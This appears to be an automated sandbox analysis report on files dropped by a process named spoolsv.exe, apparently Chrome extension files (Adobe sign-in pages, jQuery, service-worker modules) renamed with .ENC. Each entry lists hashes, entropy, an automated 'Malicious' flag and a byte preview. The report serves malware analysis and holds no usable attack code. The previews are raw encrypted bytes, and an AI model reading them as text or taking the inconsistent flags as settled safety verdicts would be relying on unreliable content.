                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1984
                                                                                                                                                                                                                                                      Entropy (8bit):7.919983178990722
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZkIKvecm3Mir+LYlcahlnje:ZP0UmdWhIooP+Isecm3ziLYlcah5e
                                                                                                                                                                                                                                                      MD5:3E24B532573257ADB15F15E72B6DCE6F
                                                                                                                                                                                                                                                      SHA1:2CB13F76962B73839342C9DA08BEE32CB18FF723
                                                                                                                                                                                                                                                      SHA-256:E16A2A25500CF8C1837AEB46BE231588492AB589453D1A0C2C5EA928223AE569
                                                                                                                                                                                                                                                      SHA-512:96127FC2EE2CE7C9A4264AFF271AC9A33F3380640B1377DD7774C7AC712654F74281652CE2261E216F887A62F2D90A9B87ABDB1009F219780CCE97B3AC7319FA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R.FE...a...#...=..fp...8..^.N!9...>N.,..........z._...{.S..t%..4.!.J.....V..."2...J_...o..L..iv...zr/..;.`....X.Y%?........|%=...}6.....O.q.....>F.&.......A..|......}.Q.s.tPx].

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\indexDB.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3520
                                                                                                                                                                                                                                                      Entropy (8bit):7.94313170080738
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZP0UmdWhIooPR9MvTs54B/K6vhdN9+tPhXb77eTBU1KO:R0LdWhIdp6Q54Bt9A57ed6KO
                                                                                                                                                                                                                                                      MD5:F8F37AB92E3F926E337A15C1AA37FD65
                                                                                                                                                                                                                                                      SHA1:E77C02E8EB27B3EE7E49406DA4D5DF12F86B4370
                                                                                                                                                                                                                                                      SHA-256:B6AB3B7ACC01E38BA4C98942C783AE5766CD644226168FAE6B10E251E8F4896B
                                                                                                                                                                                                                                                      SHA-512:91C373714E53CB00047FF7FC1EA80322FD8C6F33A6CD134B6B5BBEABA794881A52ABCCDC576B77657BEC94E01DB842B47DAAE073DEEC36E5364449491A0B5E6A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R...."...A.(..k.8.^H.]!...F._.4....[......<.....9rN..C..q.....9...bs..Yu..w.sX.(...u..o.&....Tv.V..."7.........U.&2...y..s..~.@...'........+H?....c9.G....oL=..q..Z/.W..Qo.L

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\local-storage.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2224
                                                                                                                                                                                                                                                      Entropy (8bit):7.9167524607075235
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPIhf56JgWmnpKof7iT95ZBy1UDvCA38h+jn:ZP0UmdWhIooPs5tDAW7wfy1EQ+7
                                                                                                                                                                                                                                                      MD5:9E7785BB0F4FC172EDC9214E73715AB7
                                                                                                                                                                                                                                                      SHA1:5D82F5CE1A397F8560AAF5E9381244502C4696CE
                                                                                                                                                                                                                                                      SHA-256:22D892A5A8F0CD6BDC28E2483232A7527FF6115571AC7EF8DB6948DFC78594A1
                                                                                                                                                                                                                                                      SHA-512:3E6328662BF88124BC71FEA1686667C95BF4BAFA0A0A4146C2AB6B6E4DEB1CAC9A3357C73619EDF7B3313F6AAD04B4AE4378A01EF2C11E4C06415331FCE5DF10
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'6.aA..e.4B.r.:;.N..a%*..Z.O..,.c.#.....u.kh...Od.c...L..5.,.r.%...s...d,..<.@..uP."......@.%..`#...N0.H.......t.......q..<.3.A..]`>3.ty.A...G....K<I..M.'9P..E.|.>.....e...[=..{..{"lz.....3)8..=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\locale.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2496
                                                                                                                                                                                                                                                      Entropy (8bit):7.930835804146194
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooP0c/yLY+6vcMwlghPCIcmvrJcRJn:ZP0UmdWhIooPZ6H8dw2C0r6RJn
                                                                                                                                                                                                                                                      MD5:7A489E7EC937EA5270FB425D36696C3A
                                                                                                                                                                                                                                                      SHA1:AAE3BEC1C8564361116F2B45541378755B24C4C6
                                                                                                                                                                                                                                                      SHA-256:ADD15A809E76FA383D9204ACB0AED7BC60D40F17C2B69CAE5A896B331C65ABBB
                                                                                                                                                                                                                                                      SHA-512:35772A127FD0F98784E07625F5E8B4455D1AE7A2FAFD5D657D1C3C615AEAEEB0F49D06884C0DCE21A40DB8427FA2F280D765F757B0C54513A8EE661D49E65A0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'.|.R.c.H..\...}X..3..\ko.".#.Ud.n...6.?_l.......JR...2.E..o.zwr.WH....<|.8.....NH....ni.I.(......eZk. .L.%.cT5...._.r..$..9...Up..o.+v.z..5Db....o^.............".k..f.h....z...Zw...x*..d....T.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\common\loggingApi.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3040
                                                                                                                                                                                                                                                      Entropy (8bit):7.945375728142105
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZq+kAfueDNXP3dEDLxXAplIOm1PDsQ5JGFgUbe21ReAy2:ZP0UmdWhIooP2R6dE/xUlI/5JGGUS2nP
                                                                                                                                                                                                                                                      MD5:EB3CADF003650ED2B0D017FBF7364B00
                                                                                                                                                                                                                                                      SHA1:F4F88F2BCC696460CFD2DFA3AA579158600D0972
                                                                                                                                                                                                                                                      SHA-256:7F29FF8BAAFB347CB0AD675E267A3D3BCC87F85F5A06D6F2E294885EC4CEE3B2
                                                                                                                                                                                                                                                      SHA-512:6B5643A6176DC62A828508BA0A41C739743228F2685A745F802CF8089245F9A2D5582D022893684C4550F75634DAF765157B2C4A708587CED5AD0F81DFE05BB4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R..\VkFW...dT......B/w.J..r..Zc@j..E."I.....}...0..s".mW8.'.B._.9.s[.h....)..@}.Al.p..I4..N...L.i...W...$...*...U..V...P.......y..%.j.qM...w.p.G].zN...6.......E._6..1)...s.y.`

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):267200
                                                                                                                                                                                                                                                      Entropy (8bit):7.999370889549762
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:m+7SPKHOLyHj4fIRb125u7TFWvhJnr6A1HWaCwEp5Gu:mY8KHOLyHjIYoKE9B9Cw8B
                                                                                                                                                                                                                                                      MD5:911F4F1F33F6DD7CC305F02345FFB5E2
                                                                                                                                                                                                                                                      SHA1:983B9E249F864D8E9F930D22462DF8BAB3BC3539
                                                                                                                                                                                                                                                      SHA-256:0E2BEF9BBF6DC8BDC04C0A4B89E3014091FBA13BDE9B7A783EC0FE8B5B9253F9
                                                                                                                                                                                                                                                      SHA-512:9D1DD0B421471463E42A10EF9BAB6EC100C5CF58A76B9FBAF053E6E1122F6BEF768C276602611F1F46F1AB283B725FD3626A8E3A55F64F95DAD9FD88DB0396C1
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:_S.6q..I.....)...E.`......V.N..hS.....M..C#.,.tb#.w\JL..NM.i...O:qiy.N.....c....bl.ro?.E.=*...qrr..:...!Y..i.>).+[M..F.s"05..;.B........G;.w.+.....#Y.....v...D.1HHh.q.h...?].2...&Y#i$.A... ..G.F.qDko......2.\......,8.$...M.!K..n<.`.^s&....C.j...uKy..>._+.j.k'..[m]..e.]&!P5.M.yaw.....O.`..C...c.p"&.......a...N...d.0..VO~(....+.cR.s....Xj$"u..a..~.3.i.m.U....-.....lmo..8..E.K".~}XQ.B~.H.t.MX....d...Y..4./z..S2.c@.w9O.f..].]'V._..2.w...P.V.R9..9r...+..m........-..w.Z.. ..C_...w{.[.z.xwB..'...]v.......|.{nM.I/qg..GpS$....B..e..a..q.I..V........r.x.b.%...AU..W=f.B....7.`.sa.6.e...2..X4......!.Ba......y.m....v.....2..;.I.&..$...,f.hKW.z..a..^..|OI?.%M<.P..M......i......~e5eS.....~./f...b.`Q..,V...[..g...n.P"\~.`.....&<.77...z..nJ....t....uJ....FC}dj.x&.....+.@.7N..0/".q|..E..hy.......~I".&..G....`Qs`8....J."..y@=.......d.`..Nz..P...!..=P....%....D.pP6*.}...#......B..{..r...F....,.(...%.......'..E.'$.:.u..o....d..HMo.)ya.....gSh.M<..~&.T{C..0t.l{.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\libs\jquery-3.1.1.min.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):86720
                                                                                                                                                                                                                                                      Entropy (8bit):7.997874745245629
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:i0jV/0i0EbM0L3e+ERfJOXJ1ix2UTbgBxxKakLHMUqQGRzhrJgtiH7grmD2+1a:JFt0EbW+E9JOXJ182GgBxxKZLsUqQEGx
                                                                                                                                                                                                                                                      MD5:D49A39D5ED2FE5A77CE64FDD5DD75E7D
                                                                                                                                                                                                                                                      SHA1:E8EDF4509751451F241D1F4C5D099012B127D54C
                                                                                                                                                                                                                                                      SHA-256:99EA5C47FA11DD801D2E41AAE695B86A0D29152859F41ECBC7F675EA72E38326
                                                                                                                                                                                                                                                      SHA-512:C0B4CE785456D0969B0EC60999FD36AD2D4BC468147D303DE1ED8792347AEC48E8746ADAE68C73C2C38211F1C109111074D10E7334806658B00371B13F8DFFE3
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:E...=5 .b...7....Q+.....l...z..)...x/.LN.K......6lh....?.y.`4....Wu...q.E.......,.:.{..[{.$.{A.s{...z...vT.<s.~............fS.\.K..NKU.....L=]...L/j*.ue..,.!..*R.7Rz[.....W..yBvf.C.~8.(q...r.&..;.<....N....K)h...%..HD.aZ...*?P(...6.y....<k..,. .'O.:2b...p..Slwg.o..`3.y.C...K...S.....y.|=k....m].S..iYr.....v.x..3..^xL?.i7......M.i..>..)9....TA.'.z.....\w.2T......3C...9....L.EW..k[RRl...*...W....2"...].%nU@ .......\o.....mc!..i.....;.Y.l&...J!.=.D...&.r.U%....I..6..&.6._..e.=..|C...5...<...*;........KO#.G./."1.TS;.!/N..A...&..QN.q........$....0[x.ax..."..*A..J".5. 1.f..~.=.....,W;V>..w.*)....e.4.....-M.8....c.J.y...UF...}.^.$...d...p.0..4.....b..}...s$.a.........>^#...*.......^a3*.*\r.1G....Ou.........B.N..."...v.f.....F.e.c....?...f....]....TA~...F@y...2.s(\...;....q...R_.*....",.......U`L.y.'....<..dp...],..8oM99.0&.../1..\.....[.. A..d|.T.cG.... ..;.!....?a...o...D5.)..w...0z.K...S5Yx..4Q]...?....x...V.*..'.jB....0..u.[6.Uk...$

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\service-worker.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3456
                                                                                                                                                                                                                                                      Entropy (8bit):7.948664640173928
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZP0UmdWhIooPx19dMACLUFelJMXxqEeLDHJ4b:R0LdWhIdBdMAWkUMXpeHJi
                                                                                                                                                                                                                                                      MD5:D3687C81B65EDCB9E9395F06BBE57C56
                                                                                                                                                                                                                                                      SHA1:472BDF432053A38E2DC95CBA30BA76F47128899F
                                                                                                                                                                                                                                                      SHA-256:2D8B75B8CC5CAAB0E352667B5C2B6F7D54C5F98CB733CF74B7909765816ACA27
                                                                                                                                                                                                                                                      SHA-512:4C43368897E97C99B6BE246B73298DF75387A131DFCE98E461F60988EB26000154A3E7C96C8D04B1730183CCD97C291813D6336BE009A27549E47E0192B5B873
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R.......ls.#...M.......#Y..k`..t..?Gj...Rhr6....UZc...r....(I!../.k.;.......}.....B..d.).....0..Vs...>3....1a..B.7_..J2.-.3......&..j..[.Sm.....KrU ...?.....Q:.,,.v..$}(.N...b.g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\signInAdobeYolo.html.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1440
                                                                                                                                                                                                                                                      Entropy (8bit):7.857273472021684
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:olSKCbHZsLPGdOHrSY8VGxcqJ7WYB+T9KYVunS5WQ1ErwG4VfIW:o+5sLPNLH8LY8ToYVcSgQ1ErwdVL
                                                                                                                                                                                                                                                      MD5:1325C2CC2061A711B3E01DC816C7E10D
                                                                                                                                                                                                                                                      SHA1:BD59C917BB656E244D797C837C13988D10E73C9C
                                                                                                                                                                                                                                                      SHA-256:8E0904C2DEB7B35119C9BD65E8C0D2E0B7C077318A7F522FE04644B7A5E7354C
                                                                                                                                                                                                                                                      SHA-512:BE7509ECBE7B23A3B41466761920F13BD308F9E1245812909D1260954CA5CB2E178C7DB37DF9233F18BB5FEB71908FFDAB3FC80299D7420D5AD55FE7597EC923
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.oY6 ..-t....Z...X.M..T..W..jE.C........~............t..W..@.(..T.)......L.(..]3p..I@Uj.P.......P.f#.6\.G.-.6YA..~.....=.?x.../..-j.h".......k.{;.o...k(b.5k..M:....B...d.o.th:i...M>k...b./.S........l#&z..?M~...4i.$...f].N....H..x./g.2..?.......mp..z..p`..;...x........;..J./..s......%.|g..Z....J..\e...B.00..$,eQ3.4..6".NEj.S..QDK.7........!uH.F.q_\.......~B!./.#.h..6..*6.;(}.b..\J6p;.9D*......k.<..".i.U.....^.1.U.x...G..@.%h..f-..\..w...+...........\.....*.#%...SI^z.+_O........4...a....AO'..k|.".....UV...Va....u...S.R.Y.!0x._.d..D..;...>Y.b.!.....i,.M....~.w.i<e".P..%`.v..*.......Qb.H......{...D.Id{... ....K}.....Mvx..0.Yf.`V..+.U{/<..h....p.:.G....w.{..e......j....Q].S..+A~.......([.N3...2...Q..-au.XU......2C.bg!&I......@F.... Ew..`..n..$eGm..ke......~....r.7..A..iQDF..Gyl...}.dAj.<`:.....O?{|.....h....qV...+.0.Z'......F.q.p'..D...cZ...m@x+....,.A..x.....x:.e..".D..)G..7.~.N..T.Sd.F+1. .Z.F....-...&'N.....gT.A`...bY.g*..]&.+5..(.J$.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\signInHandler.html.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1072
                                                                                                                                                                                                                                                      Entropy (8bit):7.807386651379505
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:oloA18pPkqEIrigaDN2bplREDsWK7AZ7TO1qP:oyerIrigaw1qsWKUdq1qP
                                                                                                                                                                                                                                                      MD5:52A54A55FCD7559C4C5494C76F263D45
                                                                                                                                                                                                                                                      SHA1:013D6D913789595A23EE2A550D75B93F91C6874F
                                                                                                                                                                                                                                                      SHA-256:60D1034AAE657988055ED308036262A636129D430C69E3EA5983A2B83BF7CEC6
                                                                                                                                                                                                                                                      SHA-512:C226567E3E500B7C6564AF2764E8B76B4F71DD70C62D9B36DC5F0C5029D52FD708AB6346A2D4AE94D19CB56A7DF512183637045856EAF82A33B6B07D77FDD315
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.oY6 ..-t....Z...X.M..T..W..jE.C........~............t..W..@.(..T.)......L.(..]3p..I@Uj.P.......P.f#.6\.G.-.6YA..~.....=.?x.../..-j.h".......2.3...M.R...].#.A..f..W#.H;6b(..=..:..PQ`.....(A:.....z.%i...... @..Q.du..Y..2s-o..#.gK.B.h...B....!..Ni..JaFE.... L..y.).@.5zm.hc.~Z....*..05.F....{.$..{".w}@5.kc.N+.....d.Z.y..3.VA=.5..w......1..K.)!....%E..D.Ak...`...lJ.iB^.z.X1.LLslO....3..;......6.......;+.k...y.8qP.`[h....S....i.Yb... ..I..qr.R<.K.,.q......Gb...c.|n.+ .zL.W<4=..f..z.L.q.`......)m....S...DsE.c....7.H.m._....h.Y..0)^.>#..\.Ej....6.m;..._....)~...-c..Qj.."`.TO.Y.~.....'.1.~.>.n,..;....4...AK].,.........I5.L..cg>t5....K.........4...........T*....J...s....P..j\n..c.=...s....BN"{s.$..0I.C.~.O..+.}.............LJI..l.J...nG..C.....n...]d%.gb.....L.................<..[. ..4...Y.n./.7..Lt._~...X...[..i...6...u..w."d..>M....g+#...i..'....gO......c....R.R,..Y...9.q..Q.....>/.D .....@...... .YZE......Gs....4...S...8a.(.........P.>a&xg..p#..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\acro-actions.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5232
                                                                                                                                                                                                                                                      Entropy (8bit):7.966869549785892
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:ZP0UmdWhIooPDhpIxHtaizPnjhVvcQ18W1GKTcX4CLS65Nn:R0LdWhIdVpIxNaQP0VW1j2z7
                                                                                                                                                                                                                                                      MD5:1CC475A217CFB8B7A311399C42ECEE0A
                                                                                                                                                                                                                                                      SHA1:ABA2212876CCDB994AC6B789703CA9C77F8286FA
                                                                                                                                                                                                                                                      SHA-256:6EABF2924C444684E17D20CC99635BC2164CFA2163A1200BC868AD238D613257
                                                                                                                                                                                                                                                      SHA-512:F71AFF57C2449C60EED4D1AD235BA1C00FFFDC8B625FAFEA97306641D512265534A5E0587791302F0010F9363F9AA77AA3B58CC2E003E9E5235FF5EEE42BC250
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:5....aj.o..q..u..z.*....IB...D..g.K3*.4-2%V..N......R.L...(....Ax3..6.....q.n.O.O...$...T.......$.`:c.....I2.q.@.....m..@Z....t[2Y.7......9.c:}y.....v.3lz..?...v..9l.(G..Yu.<.1.,......3.A.||.L.3.r....G.7..&p..].".....i..pt.|:..=6s....-.?...s.~.K.j`.&.....U..{.....@..~Ck.*...>?....G.&@.t....../..B..;.. ..3.._O..k.......$S..='....'..l..5.....Y..;.ME..,..S....C........n~.....@..,.........aw*\.l....!%V%2...$.z..I..rr..w.`I M)..........}O....,.d...N....dsr..U.I.C'...rd+T....$$W..R.-..G.K.^(.......P....\.IJ..f9.gi.@5.!.d.P.=VYOj..RI.m.|Ko}...SK.^.f....g..Og c..$.n..L..._.:y...h..l...8.....i{.q.Z).q...W{Q'...r..........w2.-yY..r...4W.='E..G.....y.M...:. ...n..z.\...!y........Q....7..r.c!p.\n......Y.N.K1. ..L..u.6.`m...../i[..v..6..6S....iJ.Y.Q[....?.?h.].#(3..d.m'g.C...3......%R.8T....~..".....e.A3....2..wO!.2...n0..8.q.^n.....9..GRNj...k..1.n.g&W..,.+M......dN..s}.#...b.J..s....?....N_;...Wn'Br3E..P.O.T.U..i....2fQK..RE.M..u2....O%..k@..x.A.)..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir5952_991612011\CRX_INSTALL\sw_modules\acro-gstate.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2384
                                                                                                                                                                                                                                                      Entropy (8bit):7.931983856046289
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:ZP/D4rQkk8dWABEIooPZx9YOzExS+KYNE8EmqbbmJ0Buw+DXBNKfxVe:ZP0UmdWhIooPH0KYNE80usutDXufLe
                                                                                                                                                                                                                                                      MD5:1355C1D90663880BEBB771F5ED1EE43F
                                                                                                                                                                                                                                                      SHA1:1CC1073FBA088B3383FD77A1E969250CFA320691
                                                                                                                                                                                                                                                      SHA-256:B4292832E9DCC16091B98B6E0600CE5358FA52E014811541BEC53C571A53DF64
                                                                                                                                                                                                                                                      SHA-512:525827638C158A42668546C312D6B328704CD6317F96544D6DCBEE2F83571A0F4CDF8008300743643653FFC24292EF65EA6814230E1674A045E21D1262A4B322
                                                                                                                                                                                                                                                      Malicious:false
